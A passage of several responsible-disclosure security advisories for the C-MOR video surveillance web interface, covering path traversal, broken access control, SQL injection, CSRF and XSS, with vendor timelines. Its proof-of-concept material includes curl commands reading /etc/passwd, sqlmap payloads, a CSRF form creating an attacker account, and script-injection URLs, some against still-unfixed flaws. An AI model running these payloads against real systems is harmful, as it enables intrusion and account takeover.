C-MOR Video Surveillance version 5.2401 suffers from a path traversal vulnerability.

Advisory ID:               SYSS-2024-025  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Relative Path Traversal (CWE-23)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45178  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper user input validation, it is possible to download  
arbitrary files from the C-MOR system via a path traversal attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functionalities are vulnerable to path traversal attacks, which is  
due to insufficient user input validation.

For instance, the download functionality for backups provided by the  
script "download-bkf.pml" is vulnerable to a path traversal  
attack via the parameter "bkf".

This enables an authenticated user to download arbitrary files as  
Linux user "www-data" from the C-MOR system.

Another path traversal attack is in the script "show-movies.pml",  
which can be exploited via the parameter "cam".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the following HTTP POST request with the relative path  
"../../../../etc/passwd" as value for the parameter "bkf", it is  
possible to download the file "/etc/passwd":

POST /download-bkf.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 26

bkf=../../../../etc/passwd

An example of a successful path traversal attack is demonstrated via  
the following curl command:

$ curl -X POST -d 'bkf=../../../../etc/passwd' --user   
'<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH'   
https://<HOST>/download-bkf.pml  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
libuuid:x:100:101::/var/lib/libuuid:/bin/sh  
Debian-exim:x:101:103::/var/spool/exim4:/bin/false  
statd:x:102:65534::/var/lib/nfs:/bin/false  
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin  
cam:x:1000:1000:Cam,,,:/home/cam:/bin/bash  
postfix:x:104:107::/var/spool/postfix:/bin/false  
stunnel4:x:105:109::/var/run/stunnel4:/bin/false  
mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false  
messagebus:x:107:113::/var/run/dbus:/bin/false  
ntp:x:108:114::/home/ntp:/bin/false  
download:x:1002:1002:Download User:/home/download:/bin/bash

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-025

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Path Traversal

C-MOR Video Surveillance version 5.2401 suffers from an improper access control privilege escalation vulnerability that allows for a lower privileged user to access administrative functions.

Advisory ID:               SYSS-2024-024  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Improper Access Control (CWE-284)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45170  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper or missing access control, low-privileged users can  
use administrative functions of the C-MOR web interface.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functions are only available to administrative users.

However, access to those functions is restricted via the web application  
user interface and not checked on the server side.

Thus, by sending corresponding HTTP requests to the web server of the  
C-MOR web interface, low-privileged users can also use administrative  
functionality, for instance downloading backup files or changing  
configuration settings.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

In this example, a low-privileged user downloads backup files by  
directly sending a corresponding HTTP POST request to the page  
"download-bkf.pml".

For this, the following HTML code can be used:

<html>  
     <body>  
         <form action="https://<HOST>/download-bkf.pml" method="POST">  
             <input type="text" name="bkf" value="" placeholder="Please   
insert the file name." /><br>  
             <input type="submit" value="Download">  
         </form>  
     </body>  
</html>

This PoC attack can also be performed using the following curl command:

curl -X POST -d '<FILENAME>' --user '<USERNAME:PASSWORD>' --ciphers   
'DEFAULT:!DH' https://<HOST>/download-bkf.pml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-024

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Improper Access Control

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a remote SQL injection vulnerability.

Advisory ID:               SYSS-2024-023  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        SQL Injection (CWE-89)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45174  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper validation of user-supplied data, different  
functionalities of the C-MOR web interface are vulnerable to SQL  
injection attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
provided functionalities of the C-MOR web interface are vulnerable  
to SQL injection attacks.

These kinds of attacks allow an authenticated user to execute arbitrary  
SQL commands in the context of the corresponding MySQL database.

In the following pages, SQL injection vulnerabilities were found:

* list-timelapse.plm (URL parameter: "cam")  
* list-motion.plm (URL parameter "cam")  
* show-movies.plm (URL parameter "cam")

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the software tool sqlmap[4], the SQL injection vulnerabilities  
via the URL parameter "cam" could be easily exploited, as the following  
output exemplarily illustrates:

(...)  
sqlmap resumed the following injection point(s) from stored session:  
- ---  
Parameter: cam (GET)  
     Type: error-based  
     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or   
GROUP BY clause (FLOOR)  
     Payload: days=1100&cam=cam1 AND (SELECT 2483 FROM(SELECT   
COUNT(*),CONCAT(0x717a707071,(SELECT   
(ELT(2483=2483,1))),0x717a707871,FLOOR(RAND(0)*2))x FROM   
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

     Type: time-based blind  
     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
     Payload: days=1100&cam=cam1 AND (SELECT 9790 FROM   
(SELECT(SLEEP(5)))Yfcf)  
- ---  
[17:16:12] [INFO] the back-end DBMS is MySQL  
[17:16:12] [INFO] fetching banner  
[17:16:12] [INFO] resumed: '5.1.66-0+squeeze1'  
web application technology: Apache  
back-end DBMS: MySQL >= 5.0  
banner: '5.1.66-0+squeeze1'  
(...)

By exploiting the SQL injection vulnerabilities, the MySQL database  
could be accessed and dumped as database user "cam".

In version 6.00PL01, some SQL injection attack instances were fixed.  
However, others could still be found, for example via the URL  
parameter "c" on the page getpic.pml.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The described security vulnerability has not been fixed entirely in  
the newly released software version 6.00PL01.

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-023

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-023.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/  
[4] sqlmap GitHub repository  
     https://github.com/sqlmapproject/sqlmap

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 SQL Injection

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a cross site request forgery vulnerability.

Advisory ID:               SYSS-2024-022  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Cross-Site Request Forgery (CWE-352)  
Risk Level:                Medium  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45172  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to missing protection mechanisms, the C-MOR web interface is  
vulnerable to cross-site request forgery (CSRF) attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The C-MOR web interface does not offer any protection against CSRF  
attacks. These kinds of attacks force end users respectively their web  
browsers to perform unwanted actions in a web application context in  
which they are currently authenticated.

CSRF attacks specifically target state-changing requests, for example in  
order to enable or disable a feature, and not data theft, as an attacker  
usually has no possibility to see the response of the forged request.

In general, CSRF attacks are conducted with the help of the victim, for  
example by a user visiting an attacker-controlled URL sent by e-mail in  
their web browser. Often, CSRF attacks make use of cross-site scripting  
attacks, but this is not mandatory.

CSRF attacks can also be performed against a web application if a victim  
is only visiting an attacker-controlled web server. In this case, the  
attacker-controlled web server is used to generate a specially crafted  
HTTP request in the context of the user's web browser which is then sent  
to the vulnerable target web application.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTML file containing a web form generates a simple  
crafted HTTP POST request that creates a new user:

<html>  
     <body onload="document.forms[0].submit()">  
         <form action="https://<HOST>/dosetpassword.pml" method="POST">  
             <input type="hidden" name="user" value="attacker" />  
             <input type="hidden" name="user_fullname" value="Attacker" />  
             <input type="hidden" name="pw1" value="password" />  
             <input type="hidden" name="pw2" value="password" />  
         </form>  
     </body>  
</html>

When an authenticated C-MOR user with administrative privileges  
visits a web server hosting this HTML file, a new attacker-controlled  
user is created.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-022

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-022.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter and Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Cross Site Request Forgery

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a persistent cross site scripting vulnerability.

Advisory ID:               SYSS-2024-021  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Persistent Cross-Site Scripting (CWE-79)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45177  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper input validation, the C-MOR web interface is vulnerable  
to persistent cross-site scripting attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that the camera  
configuration is vulnerable to a persistent cross-site scripting attack  
due to insufficient user input validation.

This kind of attack enables an attacker to persistently store attack  
vectors in form of arbitrary code, for instance JavaScript code, in the  
web application database, which may be executed in the context of other  
users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

An authenticated user can set the location of a camera. If valid  
JavaScript code is used as location value, this code will be  
persistently stored in the web application database.

The injected JavaScript code is served to users and executed in their  
web browser's context when using different functionality of the C-MOR  
web interface, for instance camera settings via "show-movies.plm" or  
system administration via "systemadministration.plm".

The following HTTPS POST request illustrates storing an attack vector  
via the parameter "location":

POST /changelocation.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 81

location=location%3Cscript%3Ealert%28%22SySS+XSS%21%22%29%3C%2Fscript%3E&cam=cam1

An excerpt of the resulting HTML source code containing the injected  
JavaScript code is shown below:

(...)  
<input type=submit value="Aufzeichnung aktivieren" class="link_button2">   
location<script>alert("SySS XSS!")</script><br>  
(...)

This PoC attack can be performed using the following curl command:

curl -X POST -d 'location=location<script>alert("SySS   
XSS!")</script>&cam=cam1' --user "<USERNAME>:<PASSWORD>" --insecure   
--ciphers 'DEFAULT:!DH' https://<HOST>/changelocation.pml

In version 6.00PL01, persistent cross-site scripting vulnerabilties have  
not been fixed completely. For example, the following attack vector can  
successfully store attacker-controlled JavaScript code in the logs:

curl -X POST \  
    -d 'cam=</textarea><script>alert("Hello from   
XSS")</script><textarea>&days=1100' \  
    --user "<USERNAME>:<PASSWORD>" \  
    --insecure \  
    --ciphers 'DEFAULT:!DH' \  
    https://<HOST>/show-movies.pml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The described security vulnerability has not been fixed entirely in the  
newly released software version 6.00PL01.

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-021

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-021.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Cross Site Scripting

C-MOR Video Surveillance version 5.2401 suffers from a reflective cross site scripting vulnerability.

Advisory ID:               SYSS-2024-020  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Reflected Cross-Site Scripting (CWE-79)  
Risk Level:                Medium  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45176  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper input validation, the C-MOR web interface is vulnerable  
to reflected cross-site scripting attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functions are prone to reflected cross-site scripting attacks due to  
insufficient user input validation.

This kind of attack allows an attacker to send a manipulated link to  
an authenticated victim in order to execute arbitrary JavaScript code  
in the context of the victim's web browser.

Reflected cross-site scripting vulnerabilities were found in the  
following C-MOR scripts and exploited via different URL parameters,  
for instance the parameter "ujava":

* index-de.plm  
* list-timelapse.plm  
* list-motion.plm  
* setdelays.plm  
* show-movies.plm  
* show-movies-f.plm  
* uploadcambackup.plm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following three sample attack vectors exemplarily demonstrate  
the found security issue.

1) index-de.plm

The following URL is an example of an attack vector exploiting a  
reflected cross-site scripting vulnerability via the URL parameter  
"ujava" of the web interface index page "index-de.plm":

https://<HOST>/index-de.pml?ujava="><script>alert("SySS XSS!")</script><z="

2) list-timelapse.plm

The following URL is an example of an attack vector exploiting a  
reflected cross-site scripting vulnerability in the page  
"list-timelapse.plm" via the URL parameter "days":

https://<HOST>/list-timelapse.pml?days=1100&cam=cam1"><script>alert("SySS   
XSS!")</script><z="

3) show-movies.plm

The following URL is an example of an attack vector exploiting a  
reflected cross-site scripting vulnerability in the page  
"show-movies.plm" via the URL parameter "days":

